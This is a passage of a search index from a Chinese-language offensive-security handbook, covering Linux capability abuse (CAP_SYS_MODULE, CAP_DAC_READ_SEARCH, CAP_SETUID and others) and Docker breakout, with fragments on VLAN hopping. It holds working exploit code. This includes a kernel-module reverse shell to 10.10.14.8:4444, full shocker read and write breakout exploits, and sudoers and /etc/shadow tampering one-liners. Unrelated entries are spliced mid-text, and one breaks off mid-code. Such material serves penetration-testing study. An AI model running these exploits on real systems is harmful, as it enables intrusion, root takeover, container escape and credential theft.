=cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_sys_ptrace,cap_mknod,cap_audit_write,cap_setfcap\\nSecurebits: 00/0x0/1\'b0\\nsecure-noroot: no (unlocked)\\nsecure-no-suid-fixup: no (unlocked)\\nsecure-keep-caps: no (unlocked)\\nuid=0(root)\\ngid=0(root)\\ngroups=0(root 列出 主机 中运行的 进程 ps -eaf 获取 架构 uname -m 查找适用于该架构的 shellcode ( https://www.exploit-db.com/exploits/41128 ) 查找一个 程序 将 shellcode 注入到进程内存中 ( https://github.com/0x00pf/0x00sec_code/blob/master/mem_inject/infect.c ) 修改 程序中的 shellcode 并 编译 它 gcc inject.c -o inject 注入 并获取你的 shell : ./inject 299; nc 172.17.0.1 5600","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » CAP_SYS_PTRACE","id":"1847","title":"CAP_SYS_PTRACE"},"1848":{"body":"CAP_SYS_MODULE 使进程能够 加载和卸载内核模块 (init_module(2)、finit_module(2) 和 delete_module(2) 系统调用) ,提供对内核核心操作的直接访问。此能力带来了严重的安全风险,因为它允许特权升级和完全系统妥协,通过允许对内核的修改,从而绕过所有 Linux 安全机制,包括 Linux 安全模块和容器隔离。 这意味着你可以 在主机的内核中插入/移除内核模块。 带有二进制文件的示例 在以下示例中,二进制文件 python 拥有此能力。 bash getcap -r / 2>/dev/null\\n/usr/bin/python2.7 = cap_sys_module+ep 默认情况下, modprobe 命令会检查目录 /lib/modules/$(uname -r) 中的依赖列表和映射文件。 为了利用这一点,让我们创建一个假的 lib/modules 文件夹: bash mkdir lib/modules -p\\ncp -a /lib/modules/5.0.0-20-generic/ lib/modules/$(uname -r) 然后 编译内核模块,您可以在下面找到两个示例,并将其复制 到此文件夹: bash cp reverse-shell.ko lib/modules/$(uname -r)/ 最后,执行所需的python代码以加载此内核模块: python import kmod\\nkm = kmod.Kmod()\\nkm.set_mod_dir(\\"/path/to/fake/lib/modules/5.0.0-20-generic/\\")\\nkm.modprobe(\\"reverse-shell\\") 示例 2:带二进制文件 在以下示例中,二进制文件 kmod 具有此能力。 bash getcap -r / 2>/dev/null\\n/bin/kmod = cap_sys_module+ep 这意味着可以使用命令 insmod 插入内核模块。按照下面的示例获取一个 reverse shell ,利用这个特权。 带环境的示例(Docker 突破) 您可以使用以下命令检查 Docker 容器内启用的能力: bash capsh --print\\nCurrent: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+ep\\nBounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap\\nSecurebits: 00/0x0/1\'b0\\nsecure-noroot: no (unlocked)\\nsecure-no-suid-fixup: no (unlocked)\\nsecure-keep-caps: no (unlocked)\\nuid=0(root)\\ngid=0(root)\\ngroups=0(root) 在之前的输出中,您可以看到 SYS_MODULE 权限已启用。 创建 将执行反向 shell 的 内核模块 和 Makefile 以 编译 它: reverse-shell.c #include \\n#include \\nMODULE_LICENSE(\\"GPL\\");\\nMODULE_AUTHOR(\\"AttackDefense\\");\\nMODULE_DESCRIPTION(\\"LKM reverse shell module\\");\\nMODULE_VERSION(\\"1.0\\"); char* argv[] = {\\"/bin/bash\\",\\"-c\\",\\"bash -i >& /dev/tcp/10.10.14.8/4444 0>&1\\", NULL};\\nstatic char* envp[] = {\\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\\", NULL }; // call_usermodehelper function is used to create user mode processes from kernel space\\nstatic int __init reverse_shell_init(void) {\\nreturn call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);\\n} static void __exit reverse_shell_exit(void) {\\nprintk(KERN_INFO \\"Exiting\\\\n\\");\\n} module_init(reverse_shell_init);\\nmodule_exit(reverse_shell_exit); Makefile obj-m +=reverse-shell.o all:\\nmake -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules clean:\\nmake -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean warning Makefile 中每个 make 单词前的空白字符 必须是制表符,而不是空格 ! 执行 make 进行编译。 bash Make[1]: *** /lib/modules/5.10.0-kali7-amd64/build: No such file or directory. Stop. sudo apt update\\nsudo apt full-upgrade 最后,在一个 shell 中启动 nc,并从另一个 shell 中 加载模块 ,你将会在 nc 进程中捕获到 shell: bash #Shell 1\\nnc -lvnp 4444 #Shell 2\\ninsmod reverse-shell.ko #Launch the reverse shell 该技术的代码来自于“滥用SYS_MODULE能力”的实验室 https://www.pentesteracademy.com/ 该技术的另一个示例可以在 https://www.cyberark.com/resources/threat-research-blog/how-i-hacked-play-with-docker-and-remotely-ran-code-on-the-host 中找到。","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » CAP_SYS_MODULE","id":"1848","title":"CAP_SYS_MODULE"},"1849":{"body":"CAP_DAC_READ_SEARCH 使进程能够 绕过读取文件和读取及执行目录的权限 。它的主要用途是用于文件搜索或读取。然而,它还允许进程使用 open_by_handle_at(2) 函数,该函数可以访问任何文件,包括那些在进程的挂载命名空间之外的文件。在 open_by_handle_at(2) 中使用的句柄应该是通过 name_to_handle_at(2) 获得的非透明标识符,但它可以包含易受篡改的敏感信息,如 inode 号。Sebastian Krahmer 通过 shocker 漏洞展示了这种能力的潜在利用,特别是在 Docker 容器的上下文中,分析见 这里 。 这意味着您可以 绕过文件读取权限检查和目录读取/执行权限检查。 带有二进制文件的示例 该二进制文件将能够读取任何文件。因此,如果像 tar 这样的文件具有此能力,它将能够读取 shadow 文件: bash cd /etc\\ntar -czf /tmp/shadow.tar.gz shadow #Compress show file in /tmp\\ncd /tmp\\ntar -cxf shadow.tar.gz Example with binary2 在这种情况下,假设 python 二进制文件具有此能力。为了列出根文件,您可以执行: python import os\\nfor r, d, f in os.walk(\'/root\'):\\nfor filename in f:\\nprint(filename) 为了读取文件,你可以这样做: python print(open(\\"/etc/shadow\\", \\"r\\").read()) 示例环境(Docker突破) 您可以使用以下命令检查Docker容器内启用的能力: capsh --print\\nCurrent: = cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+ep\\nBounding set =cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap\\nSecurebits: 00/0x0/1\'b0\\nsecure-noroot: no (unlocked)\\nsecure-no-suid-fixup: no (unlocked)\\nsecure-keep-caps: no (unlocked)\\nuid=0(root)\\ngid=0(root)\\ngroups=0(root) 在之前的输出中,您可以看到 DAC_READ_SEARCH 权限已启用。因此,容器可以 调试进程 。 您可以在 https://medium.com/@fun_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3 学习以下利用是如何工作的,但简而言之, CAP_DAC_READ_SEARCH 不仅允许我们在没有权限检查的情况下遍历文件系统,还明确移除了对 open_by_handle_at(2) 的任何检查,并且 可能允许我们的进程访问其他进程打开的敏感文件 。 滥用此权限从主机读取文件的原始利用可以在这里找到: http://stealth.openwall.net/xSports/shocker.c ,以下是一个 修改版本,允许您将要读取的文件作为第一个参数指示,并将其转储到文件中。 c #include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include // gcc shocker.c -o shocker\\n// ./socker /etc/shadow shadow #Read /etc/shadow from host and save result in shadow file in current dir struct my_file_handle {\\nunsigned int handle_bytes;\\nint handle_type;\\nunsigned char f_handle[8];\\n}; void die(const char *msg)\\n{\\nperror(msg);\\nexit(errno);\\n} void dump_handle(const struct my_file_handle *h)\\n{\\nfprintf(stderr,\\"[*] #=%d, %d, char nh[] = {\\", h->handle_bytes,\\nh->handle_type);\\nfor (int i = 0; i < h->handle_bytes; ++i) {\\nfprintf(stderr,\\"0x%02x\\", h->f_handle[i]);\\nif ((i + 1) % 20 == 0)\\nfprintf(stderr,\\"\\\\n\\");\\nif (i < h->handle_bytes - 1)\\nfprintf(stderr,\\", \\");\\n}\\nfprintf(stderr,\\"};\\\\n\\");\\n} int find_handle(int bfd, const char *path, const struct my_file_handle *ih, struct my_file_handle\\n*oh)\\n{\\nint fd;\\nuint32_t ino = 0;\\nstruct my_file_handle outh = {\\n.handle_bytes = 8,\\n.handle_type = 1\\n};\\nDIR *dir = NULL;\\nstruct dirent *de = NULL;\\npath = strchr(path, \'/\');\\n// recursion stops if path has been resolved\\nif (!path) {\\nmemcpy(oh->f_handle, ih->f_handle, sizeof(oh->f_handle));\\noh->handle_type = 1;\\noh->handle_bytes = 8;\\nreturn 1;\\n} ++path;\\nfprintf(stderr, \\"[*] Resolving \'%s\'\\\\n\\", path);\\nif ((fd = open_by_handle_at(bfd, (struct file_handle *)ih, O_RDONLY)) < 0)\\ndie(\\"[-] open_by_handle_at\\");\\nif ((dir = fdopendir(fd)) == NULL)\\ndie(\\"[-] fdopendir\\");\\nfor (;;) {\\nde = readdir(dir);\\nif (!de)\\nbreak;\\nfprintf(stderr, \\"[*] Found %s\\\\n\\", de->d_name);\\nif (strncmp(de->d_name, path, strlen(de->d_name)) == 0) {\\nfprintf(stderr, \\"[+] Match: %s ino=%d\\\\n\\", de->d_name, (int)de->d_ino);\\nino = de->d_ino;\\nbreak;\\n}\\n} fprintf(stderr, \\"[*] Brute forcing remaining 32bit. This can take a while...\\\\n\\");\\nif (de) {\\nfor (uint32_t i = 0; i < 0xffffffff; ++i) {\\nouth.handle_bytes = 8;\\nouth.handle_type = 1;\\nmemcpy(outh.f_handle, &ino, sizeof(ino));\\nmemcpy(outh.f_handle + 4, &i, sizeof(i));\\nif ((i % (1<<20)) == 0)\\nfprintf(stderr, \\"[*] (%s) Trying: 0x%08x\\\\n\\", de->d_name, i);\\nif (open_by_handle_at(bfd, (struct file_handle *)&outh, 0) > 0) {\\nclosedir(dir);\\nclose(fd);\\ndump_handle(&outh);\\nreturn find_handle(bfd, path, &outh, oh);\\n}\\n}\\n}\\nclosedir(dir);\\nclose(fd);\\nreturn 0;\\n} int main(int argc,char* argv[] )\\n{\\nchar buf[0x1000];\\nint fd1, fd2;\\nstruct my_file_handle h;\\nstruct my_file_handle root_h = {\\n.handle_bytes = 8,\\n.handle_type = 1,\\n.f_handle = {0x02, 0, 0, 0, 0, 0, 0, 0}\\n}; fprintf(stderr, \\"[***] docker VMM-container breakout Po(C) 2014 [***]\\\\n\\"\\n\\"[***] The tea from the 90\'s kicks your sekurity again. [***]\\\\n\\"\\n\\"[***] If you have pending sec consulting, I\'ll happily [***]\\\\n\\"\\n\\"[***] forward to my friends who drink secury-tea too! [***]\\\\n\\\\n\\\\n\\"); read(0, buf, 1); // get a FS reference from something mounted in from outside\\nif ((fd1 = open(\\"/etc/hostname\\", O_RDONLY)) < 0)\\ndie(\\"[-] open\\"); if (find_handle(fd1, argv[1], &root_h, &h) <= 0)\\ndie(\\"[-] Cannot find valid handle!\\"); fprintf(stderr, \\"[!] Got a final handle!\\\\n\\");\\ndump_handle(&h); if ((fd2 = open_by_handle_at(fd1, (struct file_handle *)&h, O_RDONLY)) < 0)\\ndie(\\"[-] open_by_handle\\"); memset(buf, 0, sizeof(buf));\\nif (read(fd2, buf, sizeof(buf) - 1) < 0)\\ndie(\\"[-] read\\"); printf(\\"Success!!\\\\n\\"); FILE *fptr;\\nfptr = fopen(argv[2], \\"w\\");\\nfprintf(fptr,\\"%s\\", buf);\\nfclose(fptr); close(fd2); close(fd1); return 0;\\n} warning 利用程序需要找到指向主机上某个挂载内容的指针。原始利用程序使用文件 /.dockerinit,而这个修改版本使用 /etc/hostname。如果利用程序无法工作,您可能需要设置不同的文件。要找到在主机上挂载的文件,只需执行 mount 命令: 该技术的代码来自于“滥用 DAC_READ_SEARCH 能力”的实验室 https://www.pentesteracademy.com/","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » CAP_DAC_READ_SEARCH","id":"1849","title":"CAP_DAC_READ_SEARCH"},"185":{"body":"许多企业核心支持 Q-in-Q 服务提供商封装。在允许的情况下,攻击者可以在提供商 (S-tag) 内隧道任意的 802.1Q 标记流量,以跨越安全区域。捕获以 ethertype 0x88a8 并尝试使用 Scapy 弹出外部标签: python from scapy.all import *\\nouter = 100 # Service tag\\ninner = 30 # Customer / target VLAN\\npayload = Ether(dst=\\"ff:ff:ff:ff:ff:ff\\")/Dot1Q(vlan=inner)/IP(dst=\\"10.10.30.1\\")/ICMP()\\nframe = Dot1Q(type=0x88a8, vlan=outer)/payload\\nsendp(frame, iface=\\"eth0\\")","breadcrumbs":"Pentesting Network » Lateral VLAN Segmentation Bypass » 3. QinQ (802.1ad) Stacking","id":"185","title":"3. QinQ (802.1ad) Stacking"},"1850":{"body":"这意味着您可以绕过任何文件的写权限检查,因此您可以写入任何文件。 有很多文件您可以 覆盖以提升权限, 您可以从这里获取灵感 。 使用二进制文件的示例 在这个示例中,vim 具有此能力,因此您可以修改任何文件,如 passwd 、 sudoers 或 shadow : bash getcap -r / 2>/dev/null\\n/usr/bin/vim = cap_dac_override+ep vim /etc/sudoers #To overwrite it 示例与二进制 2 在此示例中, python 二进制文件将具有此能力。您可以使用 python 来覆盖任何文件: python file=open(\\"/etc/sudoers\\",\\"a\\")\\nfile.write(\\"yourusername ALL=(ALL) NOPASSWD:ALL\\")\\nfile.close() 示例:环境 + CAP_DAC_READ_SEARCH(Docker突破) 您可以使用以下命令检查Docker容器内启用的能力: bash capsh --print\\nCurrent: = cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+ep\\nBounding set =cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap\\nSecurebits: 00/0x0/1\'b0\\nsecure-noroot: no (unlocked)\\nsecure-no-suid-fixup: no (unlocked)\\nsecure-keep-caps: no (unlocked)\\nuid=0(root)\\ngid=0(root)\\ngroups=0(root) 首先阅读上一节中关于 滥用 DAC_READ_SEARCH 能力以读取任意文件 的内容,并 编译 利用程序。 然后, 编译以下版本的 shocker 利用程序 ,这将允许您在主机文件系统中 写入任意文件 : c #include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include // gcc shocker_write.c -o shocker_write\\n// ./shocker_write /etc/passwd passwd struct my_file_handle {\\nunsigned int handle_bytes;\\nint handle_type;\\nunsigned char f_handle[8];\\n};\\nvoid die(const char * msg) {\\nperror(msg);\\nexit(errno);\\n}\\nvoid dump_handle(const struct my_file_handle * h) {\\nfprintf(stderr, \\"[*] #=%d, %d, char nh[] = {\\", h -> handle_bytes,\\nh -> handle_type);\\nfor (int i = 0; i < h -> handle_bytes; ++i) {\\nfprintf(stderr, \\"0x%02x\\", h -> f_handle[i]);\\nif ((i + 1) % 20 == 0)\\nfprintf(stderr, \\"\\\\n\\");\\nif (i < h -> handle_bytes - 1)\\nfprintf(stderr, \\", \\");\\n}\\nfprintf(stderr, \\"};\\\\n\\");\\n}\\nint find_handle(int bfd, const char *path, const struct my_file_handle *ih, struct my_file_handle *oh)\\n{\\nint fd;\\nuint32_t ino = 0;\\nstruct my_file_handle outh = {\\n.handle_bytes = 8,\\n.handle_type = 1\\n};\\nDIR * dir = NULL;\\nstruct dirent * de = NULL;\\npath = strchr(path, \'/\');\\n// recursion stops if path has been resolved\\nif (!path) {\\nmemcpy(oh -> f_handle, ih -> f_handle, sizeof(oh -> f_handle));\\noh -> handle_type = 1;\\noh -> handle_bytes = 8;\\nreturn 1;\\n}\\n++path;\\nfprintf(stderr, \\"[*] Resolving \'%s\'\\\\n\\", path);\\nif ((fd = open_by_handle_at(bfd, (struct file_handle * ) ih, O_RDONLY)) < 0)\\ndie(\\"[-] open_by_handle_at\\");\\nif ((dir = fdopendir(fd)) == NULL)\\ndie(\\"[-] fdopendir\\");\\nfor (;;) {\\nde = readdir(dir);\\nif (!de)\\nbreak;\\nfprintf(stderr, \\"[*] Found %s\\\\n\\", de -> d_name);\\nif (strncmp(de -> d_name, path, strlen(de -> d_name)) == 0) {\\nfprintf(stderr, \\"[+] Match: %s ino=%d\\\\n\\", de -> d_name, (int) de -> d_ino);\\nino = de -> d_ino;\\nbreak;\\n}\\n}\\nfprintf(stderr, \\"[*] Brute forcing remaining 32bit. This can take a while...\\\\n\\");\\nif (de) {\\nfor (uint32_t i = 0; i < 0xffffffff; ++i) {\\nouth.handle_bytes = 8;\\nouth.handle_type = 1;\\nmemcpy(outh.f_handle, & ino, sizeof(ino));\\nmemcpy(outh.f_handle + 4, & i, sizeof(i));\\nif ((i % (1 << 20)) == 0)\\nfprintf(stderr, \\"[*] (%s) Trying: 0x%08x\\\\n\\", de -> d_name, i);\\nif (open_by_handle_at(bfd, (struct file_handle * ) & outh, 0) > 0) {\\nclosedir(dir);\\nclose(fd);\\ndump_handle( & outh);\\nreturn find_handle(bfd, path, & outh, oh);\\n}\\n}\\n}\\nclosedir(dir);\\nclose(fd);\\nreturn 0;\\n}\\nint main(int argc, char * argv[]) {\\nchar buf[0x1000];\\nint fd1, fd2;\\nstruct my_file_handle h;\\nstruct my_file_handle root_h = {\\n.handle_bytes = 8,\\n.handle_type = 1,\\n.f_handle = {\\n0x02,\\n0,\\n0,\\n0,\\n0,\\n0,\\n0,\\n0\\n}\\n};\\nfprintf(stderr, \\"[***] docker VMM-container breakout Po(C) 2014 [***]\\\\n\\"\\n\\"[***] The tea from the 90\'s kicks your sekurity again. [***]\\\\n\\"\\n\\"[***] If you have pending sec consulting, I\'ll happily [***]\\\\n\\"\\n\\"[***] forward to my friends who drink secury-tea too! [***]\\\\n\\\\n\\\\n\\");\\nread(0, buf, 1);\\n// get a FS reference from something mounted in from outside\\nif ((fd1 = open(\\"/etc/hostname\\", O_RDONLY)) < 0)\\ndie(\\"[-] open\\");\\nif (find_handle(fd1, argv[1], & root_h, & h) <= 0)\\ndie(\\"[-] Cannot find valid handle!\\");\\nfprintf(stderr, \\"[!] Got a final handle!\\\\n\\");\\ndump_handle( & h);\\nif ((fd2 = open_by_handle_at(fd1, (struct file_handle * ) & h, O_RDWR)) < 0)\\ndie(\\"[-] open_by_handle\\");\\nchar * line = NULL;\\nsize_t len = 0;\\nFILE * fptr;\\nssize_t read;\\nfptr = fopen(argv[2], \\"r\\");\\nwhile ((read = getline( & line, & len, fptr)) != -1) {\\nwrite(fd2, line, read);\\n}\\nprintf(\\"Success!!\\\\n\\");\\nclose(fd2);\\nclose(fd1);\\nreturn 0;\\n} 为了逃离 docker 容器,你可以 下载 主机上的文件 /etc/shadow 和 /etc/passwd, 添加 一个 新用户 ,并使用 shocker_write 来覆盖它们。然后,通过 ssh 访问 。 该技术的代码来自于“滥用 DAC_OVERRIDE 能力”实验室 https://www.pentesteracademy.com","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » CAP_DAC_OVERRIDE","id":"1850","title":"CAP_DAC_OVERRIDE"},"1851":{"body":"这意味着可以更改任何文件的所有权。 带有二进制文件的示例 假设 python 二进制文件具有此能力,你可以 更改 shadow 文件的 所有者 , 更改 root 密码 ,并提升权限: bash python -c \'import os;os.chown(\\"/etc/shadow\\",1000,1000)\' 或者 ruby 二进制文件具有此能力: bash ruby -e \'require \\"fileutils\\"; FileUtils.chown(1000, 1000, \\"/etc/shadow\\")\'","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » CAP_CHOWN","id":"1851","title":"CAP_CHOWN"},"1852":{"body":"这意味着可以更改任何文件的权限。 带二进制的示例 如果python具有此能力,您可以修改shadow文件的权限, 更改root密码 ,并提升权限: bash python -c \'import os;os.chmod(\\"/etc/shadow\\",0666)","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » CAP_FOWNER","id":"1852","title":"CAP_FOWNER"},"1853":{"body":"这意味着可以设置创建进程的有效用户 ID。 带二进制的示例 如果 python 拥有这个 capability ,你可以很容易地利用它来提升权限到 root: python import os\\nos.setuid(0)\\nos.system(\\"/bin/bash\\") 另一种方法: python import os\\nimport prctl\\n#add the capability to the effective set\\nprctl.cap_effective.setuid = True\\nos.setuid(0)\\nos.system(\\"/bin/bash\\")","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » CAP_SETUID","id":"1853","title":"CAP_SETUID"},"1854":{"body":"这意味着可以设置创建进程的有效组 ID。 有很多文件可以 覆盖以提升权限, 你可以从这里获取灵感 。 二进制文件示例 在这种情况下,你应该寻找组可以读取的有趣文件,因为你可以冒充任何组: bash #Find every file writable by a group\\nfind / -perm /g=w -exec ls -lLd {} \\\\; 2>/dev/null\\n#Find every file writable by a group in /etc with a maxpath of 1\\nfind /etc -maxdepth 1 -perm /g=w -exec ls -lLd {} \\\\; 2>/dev/null\\n#Find every file readable by a group in /etc with a maxpath of 1\\nfind /etc -maxdepth 1 -perm /g=r -exec ls -lLd {} \\\\; 2>/dev/null 一旦你找到一个可以滥用的文件(通过读取或写入)以提升权限,你可以通过以下方式 获取一个模拟有趣组的 shell : python import os\\nos.setgid(42)\\nos.system(\\"/bin/bash\\") 在这种情况下,组 shadow 被冒充,因此您可以读取文件 /etc/shadow: bash cat /etc/shadow 如果 docker 已安装,您可以 冒充 docker 组 并利用它与 docker socket 进行通信并提升权限 。","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » CAP_SETGID","id":"1854","title":"CAP_SETGID"},"1855":{"body":"这意味着可以在文件和进程上设置能力 二进制示例 如果 python 拥有此 能力 ,您可以非常轻松地利用它提升权限到 root: setcapability.py import ctypes, sys #Load needed library\\n#You can find which library you need to load checking the libraries of local setcap binary\\n# ldd /sbin/setcap\\nlibcap = ctypes.cdll.LoadLibrary(\\"libcap.so.2\\") libcap.cap_from_text.argtypes = [ctypes.c_char_p]\\nlibcap.cap_from_text.restype = ctypes.c_void_p\\nlibcap.cap_set_file.argtypes = [ctypes.c_char_p,ctypes.c_void_p] #Give setuid cap to the binary\\ncap = \'cap_setuid+ep\'\\npath = sys.argv[1]\\nprint(path)\\ncap_t = libcap.cap_from_text(cap)\\nstatus = libcap.cap_set_file(path,cap_t) if(status == 0):\\nprint (cap + \\" was successfully added to \\" + path) bash python setcapability.py /usr/bin/python2.7 warning 注意,如果您使用 CAP_SETFCAP 为二进制文件设置了新的能力,您将失去此能力。 一旦您拥有 SETUID capability ,您可以查看其部分以了解如何提升权限。 带环境的示例(Docker 突破) 默认情况下,能力 CAP_SETFCAP 被授予 Docker 容器内的进程 。您可以通过执行以下操作来检查: bash cat /proc/`pidof bash`/status | grep Cap\\nCapInh: 00000000a80425fb\\nCapPrm: 00000000a80425fb\\nCapEff: 00000000a80425fb\\nCapBnd: 00000000a80425fb\\nCapAmb: 0000000000000000 capsh --decode=00000000a80425fb\\n0x00000000a80425fb=cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap 这个能力允许 将任何其他能力赋予二进制文件 ,因此我们可以考虑 利用本页提到的其他能力突破 来 逃逸 容器。 然而,如果你尝试例如将能力 CAP_SYS_ADMIN 和 CAP_SYS_PTRACE 赋予 gdb 二进制文件,你会发现你可以赋予它们,但 二进制文件在此之后将无法执行 : bash getcap /usr/bin/gdb\\n/usr/bin/gdb = cap_sys_ptrace,cap_sys_admin+eip setcap cap_sys_admin,cap_sys_ptrace+eip /usr/bin/gdb /usr/bin/gdb\\nbash: /usr/bin/gdb: Operation not permitted From the docs : Permitted: 这是一个 有效能力的限制超集 ,线程可以假设它。它也是一个限制超集,线程可以将其添加到可继承集合的能力,前提是该线程在其有效集合中 没有 CAP_SETPCAP 能力。 看起来 Permitted 能力限制了可以使用的能力。 然而,Docker 默认也授予 CAP_SETPCAP ,因此您可能能够 在可继承的能力中设置新能力 。 然而,在该能力的文档中: CAP_SETPCAP : […] 将调用线程的边界 集合中的任何能力添加到其可继承集合。 看起来我们只能将边界集合中的能力添加到可继承集合。这意味着 我们不能将新能力如 CAP_SYS_ADMIN 或 CAP_SYS_PTRACE 放入继承集合以提升权限 。","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » CAP_SETFCAP","id":"1855","title":"CAP_SETFCAP"},"1856":{"body":"CAP_SYS_RAWIO 提供了一些敏感操作,包括访问 /dev/mem、/dev/kmem 或 /proc/kcore,修改 mmap_min_addr,访问 ioperm(2) 和 iopl(2) 系统调用,以及各种磁盘命令。FIBMAP ioctl(2) 也通过此能力启用,这在 过去 造成了一些问题。根据手册页,这也允许持有者描述性地对其他设备执行一系列特定于设备的操作。 这对于 权限提升 和 Docker 突破 非常有用。","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » CAP_SYS_RAWIO","id":"1856","title":"CAP_SYS_RAWIO"},"1857":{"body":"这意味着可以终止任何进程。 带有二进制文件的示例 假设 python 二进制文件具有此能力。如果您还可以 修改某些服务或套接字配置 (或与服务相关的任何配置文件)文件,您可以对其进行后门处理,然后终止与该服务相关的进程,并等待新的配置文件执行您的后门。 python #Use this python code to kill arbitrary processes\\nimport os\\nimport signal\\npgid = os.getpgid(341)\\nos.killpg(pgid, signal.SIGKILL) 使用 kill 提权 如果你拥有 kill 权限,并且有一个 以 root 身份运行的 node 程序 (或以其他用户身份运行),你可以可能 发送 给它 信号 SIGUSR1 ,使其 打开 node 调试器 ,以便你可以连接。 bash kill -s SIGUSR1 \\n# After an URL to access the debugger will appear. e.g. ws://127.0.0.1:9229/45ea962a-29dd-4cdd-be08-a6827840553d Node inspector/CEF debug abuse","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » CAP_KILL","id":"1857","title":"CAP_KILL"},"1858":{"body":"这意味着可以在任何端口上监听(甚至是特权端口)。 你不能直接通过这个能力提升特权。 带有二进制的示例 如果 python 拥有这个能力,它将能够在任何端口上监听,甚至可以从该端口连接到任何其他端口(某些服务需要从特定特权端口进行连接) Listen\\nConnect python import socket\\ns=socket.socket()\\ns.bind((\'0.0.0.0\', 80))\\ns.listen(1)\\nconn, addr = s.accept()\\nwhile True:\\noutput = connection.recv(1024).strip();\\nprint(output) python import socket\\ns=socket.socket()\\ns.bind((\'0.0.0.0\',500))\\ns.connect((\'10.10.10.10\',500))","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » CAP_NET_BIND_SERVICE","id":"1858","title":"CAP_NET_BIND_SERVICE"},"1859":{"body":"CAP_NET_RAW 能力允许进程 创建 RAW 和 PACKET 套接字 ,使它们能够生成和发送任意网络数据包。这可能导致容器化环境中的安全风险,例如数据包欺骗、流量注入和绕过网络访问控制。恶意行为者可能利用这一点干扰容器路由或危害主机网络安全,尤其是在没有足够防火墙保护的情况下。此外, CAP_NET_RAW 对于特权容器支持通过 RAW ICMP 请求进行的操作(如 ping)至关重要。 这意味着可以嗅探流量。 你不能直接通过这个能力提升权限。 带二进制的示例 如果二进制文件 tcpdump 拥有此能力,你将能够使用它捕获网络信息。 bash getcap -r / 2>/dev/null\\n/usr/sbin/tcpdump = cap_net_raw+ep 注意,如果 环境 提供了这个能力,你也可以使用**tcpdump**来嗅探流量。 使用二进制 2 的示例 以下示例是**python2**代码,可以用于拦截\\" lo \\"( localhost )接口的流量。该代码来自实验\\" 基础知识:CAP-NET_BIND + NET_RAW \\",来自 https://attackdefense.pentesteracademy.com/ python import socket\\nimport struct flags=[\\"NS\\",\\"CWR\\",\\"ECE\\",\\"URG\\",\\"ACK\\",\\"PSH\\",\\"RST\\",\\"SYN\\",\\"FIN\\"] def getFlag(flag_value):\\nflag=\\"\\"\\nfor i in xrange(8,-1,-1):\\nif( flag_value & 1 < with a DHCP or static address inside the voice VLAN 该技术绕过了数据/语音分离,并且在2025年的企业边缘交换机上极为常见,因为许多型号默认启用了LLDP自动策略。","breadcrumbs":"Pentesting Network » Lateral VLAN Segmentation Bypass » 4. 通过 LLDP/CDP 进行 Voice-VLAN 劫持 (IP-电话欺骗)","id":"186","title":"4. 通过 LLDP/CDP 进行 Voice-VLAN 劫持 (IP-电话欺骗)"},"1860":{"body":"CAP_NET_ADMIN 能力赋予持有者 更改网络配置 的权力,包括防火墙设置、路由表、套接字权限和暴露的网络命名空间中的网络接口设置。它还允许在网络接口上启用 混杂模式 ,允许跨命名空间进行数据包嗅探。 带二进制的示例 假设 python 二进制文件 具有这些能力。 python #Dump iptables filter table rules\\nimport iptc\\nimport pprint\\njson=iptc.easy.dump_table(\'filter\',ipv6=False)\\npprint.pprint(json) #Flush iptables filter table\\nimport iptc\\niptc.easy.flush_table(\'filter\')","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » CAP_NET_ADMIN + CAP_NET_RAW","id":"1860","title":"CAP_NET_ADMIN + CAP_NET_RAW"},"1861":{"body":"这意味着可以修改 inode 属性。 你不能直接通过这个能力提升权限。 带有二进制的示例 如果你发现一个文件是不可变的,并且 python 具有这个能力,你可以 移除不可变属性并使文件可修改: python #Check that the file is imutable\\nlsattr file.sh\\n----i---------e--- backup.sh python #Pyhton code to allow modifications to the file\\nimport fcntl\\nimport os\\nimport struct 